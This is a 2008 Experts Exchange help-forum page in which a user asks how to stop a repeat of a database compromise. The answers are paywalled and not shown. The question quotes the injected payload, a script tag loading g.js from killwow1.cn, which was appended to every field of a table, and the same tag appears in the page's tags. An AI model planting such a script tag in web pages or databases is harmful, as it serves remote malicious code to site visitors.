Advertisement

05.12.2008 at 08:32AM PDT, ID: 23394870
[x]
Attachment Details

SQL Database held on one and one got hacked today

Asked by capnet in Web Servers, Windows Network Security

Tags: , , , , ,

Hi,
I had a call from a customer today who has a dedicated server hosted by one and one.  They have a web application hosted on a SQL backend.  I had a call from my ciustomer informing me that they could not log on to their software system.  It turns out that some how the database has been hacked and in all fields within the quotation table it had the following data added to each field
<script src=http://www.killwow1.cn/g.js></script>

After a restore of the DB and a little work the site was up and running quickly but how can I prevent this from happening again.  can I block top level domanis within iis.  can we implement code that would prevent this from happening again?

Any advice welcome.

ThanksStart Free Trial
 
Loading Advertisement...
 
[+][-]05.12.2008 at 10:05AM PDT, ID: 21548678

View this solution now by starting your 7-day free trial. Setting up your free trial is quick, easy, and secure. We will return you to this solution, unlocked, when you're done.

 

About this solution

Zones: Web Servers, Windows Network Security
Tags: Microsoft, SQL Server, 2005 Express, database got hacked, SQL Server, <script src=http://www.killwow1.cn/g.js></script>
Sign Up Now!
Solution Provided By: r-k
Participating Experts: 1
Solution Grade: A
 
 
[+][-]05.27.2008 at 10:51PM PDT, ID: 21657955

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 7-day free trial to view this Expert Comment or ask the Experts your question.

 
 
Loading Advertisement...
20080716-EE-VQP-32 / EE_QW_2_20070628